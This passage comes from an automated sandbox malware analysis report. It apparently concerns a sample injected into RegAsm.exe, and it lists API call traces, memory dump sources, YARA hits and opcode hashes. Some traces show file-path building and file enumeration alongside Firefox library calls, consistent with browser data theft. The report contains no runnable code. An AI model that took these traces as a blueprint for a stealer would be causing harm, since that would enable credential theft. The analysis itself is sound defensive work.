                                                                                                                                                                                                                                                                                                  • strlen.API-MS-WIN-CRT-STRING-L1-1-0(: (malloc) Error in VirtualFree(),?,?,?,?,?,?,?,6C7F31A7), ref: 6C83061C
                                                                                                                                                                                                                                                                                                  • _write.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,: (malloc) Error in VirtualFree(),00000000,?,?,?,?,?,?,?,?,6C7F31A7), ref: 6C830627
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2074948974.000000006C7F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7F0000, based on PE: true
• Associated: 00000005.00000002.2074887473.000000006C7F0000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.2075153651.000000006C86D000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.2075205638.000000006C87E000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.2075228583.000000006C882000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_6c7f0000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: _writestrlen
                                                                                                                                                                                                                                                                                                  • String ID: : (malloc) Error in VirtualFree()$<jemalloc>
                                                                                                                                                                                                                                                                                                  • API String ID: 2723441310-2186867486
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2074948974.000000006C7F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7F0000, based on PE: true
• Associated: 00000005.00000002.2074887473.000000006C7F0000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.2075153651.000000006C86D000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.2075205638.000000006C87E000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.2075228583.000000006C882000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_6c7f0000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C8514C5
                                                                                                                                                                                                                                                                                                  • ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C8514E2
                                                                                                                                                                                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C851546
                                                                                                                                                                                                                                                                                                  • InitializeConditionVariable.KERNEL32(?), ref: 6C8515BA
                                                                                                                                                                                                                                                                                                  • free.MOZGLUE(?), ref: 6C8516B4
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2074948974.000000006C7F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7F0000, based on PE: true
• Associated: 00000005.00000002.2074887473.000000006C7F0000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.2075153651.000000006C86D000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.2075205638.000000006C87E000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.2075228583.000000006C882000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_6c7f0000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: CurrentThread$ConditionInitializeNow@Stamp@mozilla@@TimeV12@_Variablefree
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 1909280232-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: 01d329519d87ce10f1aed1e1e9642fdaf6bc69f14b1710f28c81561be63d55a7
                                                                                                                                                                                                                                                                                                  • Instruction ID: 43418f00c4ae72a2a25a39fd50fcc2839f35beaf23b6862662fc6d8409dec652
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 01d329519d87ce10f1aed1e1e9642fdaf6bc69f14b1710f28c81561be63d55a7
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6761E171A007149BDB218F25C980BDEB7B1BF89308F44892CED8A57701EB70E958CB91
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • strtok_s.MSVCRT ref: 00411FE0
                                                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(00000000,00427328,?,?,?,00000000), ref: 0041202C
                                                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(00000000,0042732C,00000000,?,?,?,00000000), ref: 00412072
                                                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(00000000,00427330,?,?,?,00000000), ref: 0041209E
                                                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(00000000,00427334,?,?,?,00000000), ref: 004120CA
                                                                                                                                                                                                                                                                                                  • strtok_s.MSVCRT ref: 004120FC
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2066368536.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: strtok_s
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 3330995566-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: 9a867f589a2270cc097cc8dc9ee75a84affa8ab41586eaa325bb300c340c361e
                                                                                                                                                                                                                                                                                                  • Instruction ID: 516accbb6ad73ddd64b0bcfde296236ffb43ab4a50d7e0c04c697361f0d5cb24
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9a867f589a2270cc097cc8dc9ee75a84affa8ab41586eaa325bb300c340c361e
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: EB41E470500201DFC720CF58C944BF6BBB8FF18304F60865EE601D3291DBB8A6A8DB9A
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C84DC60
                                                                                                                                                                                                                                                                                                  • AcquireSRWLockExclusive.KERNEL32(?,?,?,6C84D38A,?), ref: 6C84DC6F
                                                                                                                                                                                                                                                                                                  • free.MOZGLUE(?,?,?,?,?,6C84D38A,?), ref: 6C84DCC1
                                                                                                                                                                                                                                                                                                  • ReleaseSRWLockExclusive.KERNEL32(?,?,?,?,?,?,?,6C84D38A,?), ref: 6C84DCE9
                                                                                                                                                                                                                                                                                                  • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?,?,6C84D38A,?), ref: 6C84DD05
                                                                                                                                                                                                                                                                                                  • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(00000001,?,?,?,6C84D38A,?), ref: 6C84DD4A
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2074948974.000000006C7F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7F0000, based on PE: true
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_6c7f0000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: ExclusiveLockStampTimeV01@@Value@mozilla@@$AcquireCurrentReleaseThreadfree
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 1842996449-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: 126e2cadca02a5c5b8eafdf04010740ed07c521f826ccfc4fdae5c8e51cef56e
                                                                                                                                                                                                                                                                                                  • Instruction ID: b920b97221829eff998bad37695137e488407c33144dc1629c2b5dbc5231c37a
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 126e2cadca02a5c5b8eafdf04010740ed07c521f826ccfc4fdae5c8e51cef56e
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 71416DB5A00619CFCB20CF99C98499EB7F6FF89318B55896AD945A7B11D731FC00CB90
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • __lock.LIBCMT ref: 0041BF15
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0041A8F3: __mtinitlocknum.LIBCMT ref: 0041A909
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0041A8F3: __amsg_exit.LIBCMT ref: 0041A915
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0041A8F3: EnterCriticalSection.KERNEL32(00000000,00000000,?,0041B561,0000000D,?,?,0041B9B5,0041A452,?,?,0041955B,00000000,0042D6E0,004195A2,0040FC50), ref: 0041A91D
                                                                                                                                                                                                                                                                                                  • DecodePointer.KERNEL32(0042D668,00000020,0041C058,00000000,00000001,00000000,?,0041C07A,000000FF,?,0041A91A,00000011,00000000,?,0041B561,0000000D), ref: 0041BF51
                                                                                                                                                                                                                                                                                                  • DecodePointer.KERNEL32(?,0041C07A,000000FF,?,0041A91A,00000011,00000000,?,0041B561,0000000D,?,?,0041B9B5,0041A452), ref: 0041BF62
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0041B4DA: EncodePointer.KERNEL32(00000000,0041F0AC,00640400,00000314,00000000,?,?,?,?,?,0041C26F,00640400,Microsoft Visual C++ Runtime Library,00012010), ref: 0041B4DC
                                                                                                                                                                                                                                                                                                  • DecodePointer.KERNEL32(-00000004,?,0041C07A,000000FF,?,0041A91A,00000011,00000000,?,0041B561,0000000D,?,?,0041B9B5,0041A452), ref: 0041BF88
                                                                                                                                                                                                                                                                                                  • DecodePointer.KERNEL32(?,0041C07A,000000FF,?,0041A91A,00000011,00000000,?,0041B561,0000000D,?,?,0041B9B5,0041A452), ref: 0041BF9B
                                                                                                                                                                                                                                                                                                  • DecodePointer.KERNEL32(?,0041C07A,000000FF,?,0041A91A,00000011,00000000,?,0041B561,0000000D,?,?,0041B9B5,0041A452), ref: 0041BFA5
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2066368536.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Pointer$Decode$CriticalEncodeEnterSection__amsg_exit__lock__mtinitlocknum
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 2005412495-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: 2cb407143216f7dcdd8d382b271f5ba639c679548ea3be99150ba69b37ec4ebc
                                                                                                                                                                                                                                                                                                  • Instruction ID: 12baece5bebf782a7eb6a3275de27d100d6fb3587b124a7a641d24b1edf37509
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2cb407143216f7dcdd8d382b271f5ba639c679548ea3be99150ba69b37ec4ebc
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B2311830A0031ADFDF11AFA9DD846EDBAB1FF49315F10802BE510A6251DBBD4992CF99
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C82FA80: GetCurrentThreadId.KERNEL32 ref: 6C82FA8D
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C82FA80: AcquireSRWLockExclusive.KERNEL32(6C87F448), ref: 6C82FA99
                                                                                                                                                                                                                                                                                                  • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C836727
                                                                                                                                                                                                                                                                                                  • ?GetOrAddIndex@UniqueJSONStrings@baseprofiler@mozilla@@AAEIABV?$Span@$$CBD$0PPPPPPPP@@3@@Z.MOZGLUE(?,?,?,?,?,?,?,00000001), ref: 6C8367C8
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C844290: memcpy.VCRUNTIME140(?,?,6C852003,6C850AD9,?,6C850AD9,00000000,?,6C850AD9,?,00000004,?,6C851A62,?,6C852003,?), ref: 6C8442C4
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2074948974.000000006C7F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7F0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2074887473.000000006C7F0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075153651.000000006C86D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075205638.000000006C87E000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075228583.000000006C882000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_6c7f0000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: ExclusiveLock$AcquireCurrentIndex@P@@3@@ReleaseSpan@$$Strings@baseprofiler@mozilla@@ThreadUniquememcpy
                                                                                                                                                                                                                                                                                                  • String ID: data
                                                                                                                                                                                                                                                                                                  • API String ID: 511789754-2918445923
                                                                                                                                                                                                                                                                                                  • Opcode ID: 59560f65df842734ce56148546927d12fa15bc0c73d70ce8e55f3a6d0b25dc9e
                                                                                                                                                                                                                                                                                                  • Instruction ID: 5a012ccfad9b9f76f2b16699b02b75ec54e98491dd9120ca0e466088d2054585
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 59560f65df842734ce56148546927d12fa15bc0c73d70ce8e55f3a6d0b25dc9e
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 21D1BE75A083508BD730CF69CA44B9EB7E1BFC5308F509D2ED48987B51EB30A849CB92
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • __getptd.LIBCMT ref: 0041ACEC
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0041B644: __getptd_noexit.LIBCMT ref: 0041B647
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0041B644: __amsg_exit.LIBCMT ref: 0041B654
                                                                                                                                                                                                                                                                                                  • __amsg_exit.LIBCMT ref: 0041AD0C
                                                                                                                                                                                                                                                                                                  • __lock.LIBCMT ref: 0041AD1C
                                                                                                                                                                                                                                                                                                  • InterlockedDecrement.KERNEL32(?), ref: 0041AD39
                                                                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 0041AD4C
                                                                                                                                                                                                                                                                                                  • InterlockedIncrement.KERNEL32(0042E1C0), ref: 0041AD64
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2066368536.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000511000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000514000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.000000000051A000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000558000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.00000000005F1000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.000000000063F000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 3470314060-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: fd26fc3cf11281d5bdea6ae3e089808d590da5e0cc94bcecac92a17d7b331242
                                                                                                                                                                                                                                                                                                  • Instruction ID: 5cedb102cad864e6df433dc2324d4bf44794cbb6b6cbe7f796020c491a46b46f
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: fd26fc3cf11281d5bdea6ae3e089808d590da5e0cc94bcecac92a17d7b331242
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A101A531A02A11ABD720AF66A4057DE77A1BF00725F58402BF400A3690C77C5DE2CBDF
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • moz_xmalloc.MOZGLUE(00000001,?,?,?,?,6C7FEB57,?,?,?,?,?,?,?,?,?), ref: 6C82D652
                                                                                                                                                                                                                                                                                                  • memset.VCRUNTIME140(00000000,00000000,00000001,?,?,?,?,?,6C7FEB57,?), ref: 6C82D660
                                                                                                                                                                                                                                                                                                  • free.MOZGLUE(?,?,?,?,?,?,?,?,?,6C7FEB57,?), ref: 6C82D673
                                                                                                                                                                                                                                                                                                  • free.MOZGLUE(?), ref: 6C82D888
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2074948974.000000006C7F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7F0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2074887473.000000006C7F0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075153651.000000006C86D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075205638.000000006C87E000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075228583.000000006C882000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_6c7f0000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: free$memsetmoz_xmalloc
                                                                                                                                                                                                                                                                                                  • String ID: |Enabled
                                                                                                                                                                                                                                                                                                  • API String ID: 4142949111-2633303760
                                                                                                                                                                                                                                                                                                  • Opcode ID: 619e0ad1664e0977f0eae50f645cb528fa59f5df356e7864c8a5878606ef89ff
                                                                                                                                                                                                                                                                                                  • Instruction ID: c96a7f5e5a6dbfba376b43a6f0426693bd2f7060e91537d94baa9e1ec962c03f
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 619e0ad1664e0977f0eae50f645cb528fa59f5df356e7864c8a5878606ef89ff
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C8A1F770A042188FDB21CF69C588BAEBFF1AF49318F14486DD8956B741D738A885CBE1
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(00000104,01572220), ref: 004173F7
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00411670: SHGetFolderPathA.SHELL32(00000000,.kB,00000000,00000000,?,00000000), ref: 004116A8
                                                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?,00000000), ref: 0041741E
                                                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?,?), ref: 0041743E
                                                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?,?), ref: 00417452
                                                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?,015644A8), ref: 00417465
                                                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?,?), ref: 00417479
                                                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?,01571B60), ref: 0041748D
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FE20: lstrcpy.KERNEL32(00000000,004184C1), ref: 0040FE49
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00411610: GetFileAttributesA.KERNEL32(00000000,00000000,00000000,00421AB8,000000FF,?,0040E72A,?,00000000,00000000,00000000,?,?), ref: 00411637
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00417140: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 0041716E
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00417140: HeapAlloc.KERNEL32(00000000), ref: 00417175
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00417140: wsprintfA.USER32 ref: 0041718E
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00417140: FindFirstFileA.KERNEL32(?,?), ref: 004171A5
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2066368536.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000511000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000514000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.000000000051A000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000558000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.00000000005F1000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.000000000063F000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: lstrcat$FileHeap$AllocAttributesFindFirstFolderPathProcesslstrcpywsprintf
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 167551676-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: c1c4ac1ed6e2d5e65371575c7c6f7eac02c140687c42abe241e93945ccb91e40
                                                                                                                                                                                                                                                                                                  • Instruction ID: 83ca6cd176221eaf65384a2e70bd6f3e35ae6f3ada24e69a7023b9efa6df4b42
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c1c4ac1ed6e2d5e65371575c7c6f7eac02c140687c42abe241e93945ccb91e40
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8341E6B190021CABDB15EBA0CC86FDD7778AB0C704F40469EF71567191DBB8A788CBA4
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • std::exception::exception.LIBCMT ref: 0040F63F
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00419566: std::exception::_Copy_str.LIBCMT ref: 00419581
                                                                                                                                                                                                                                                                                                  • __CxxThrowException@8.LIBCMT ref: 0040F654
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00419619: RaiseException.KERNEL32(?,0040F659,-00000208,LpB,?,0040F659,0040FC50,0042BEB0,-00000208), ref: 0041965B
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040F4D0: std::exception::exception.LIBCMT ref: 0040F4FF
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040F4D0: __CxxThrowException@8.LIBCMT ref: 0040F514
                                                                                                                                                                                                                                                                                                  • memcpy.MSVCRT ref: 0040F69B
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2066368536.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Exception@8Throwstd::exception::exception$Copy_strExceptionRaisememcpystd::exception::_
                                                                                                                                                                                                                                                                                                  • String ID: LpB$@
                                                                                                                                                                                                                                                                                                  • API String ID: 2091982303-1565407916
                                                                                                                                                                                                                                                                                                  • Opcode ID: 4333e615859341e27a2035b722db1ecd76a15d6bd226179dd932d378d2aa88fe
                                                                                                                                                                                                                                                                                                  • Instruction ID: 4f50dfa9357fd886a065189dff06607fe605b6ea8e0eb8b68f4edf33fbd1ec24
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4333e615859341e27a2035b722db1ecd76a15d6bd226179dd932d378d2aa88fe
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9731D671D00205ABC724DF68C4817AEBBF4EB49360F10063BE826A7BD1D7799945CBE5
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • std::_Xinvalid_argument.LIBCPMT ref: 0040F75A
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0041F890: std::exception::exception.LIBCMT ref: 0041F8A5
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0041F890: __CxxThrowException@8.LIBCMT ref: 0041F8BA
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0041F890: std::exception::exception.LIBCMT ref: 0041F8CB
                                                                                                                                                                                                                                                                                                  • std::_Xinvalid_argument.LIBCPMT ref: 0040F797
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0041F843: std::exception::exception.LIBCMT ref: 0041F858
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0041F843: __CxxThrowException@8.LIBCMT ref: 0041F86D
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0041F843: std::exception::exception.LIBCMT ref: 0041F87E
                                                                                                                                                                                                                                                                                                  • memcpy.MSVCRT ref: 0040F7F8
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2066368536.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: std::exception::exception$Exception@8ThrowXinvalid_argumentstd::_$memcpy
                                                                                                                                                                                                                                                                                                  • String ID: invalid string position$string too long
                                                                                                                                                                                                                                                                                                  • API String ID: 85833692-4289949731
                                                                                                                                                                                                                                                                                                  • Opcode ID: 1322e0bfc0ece0e981ff8d6d8efaddbd8ceb0bc611d6478e6d54d85e031a034c
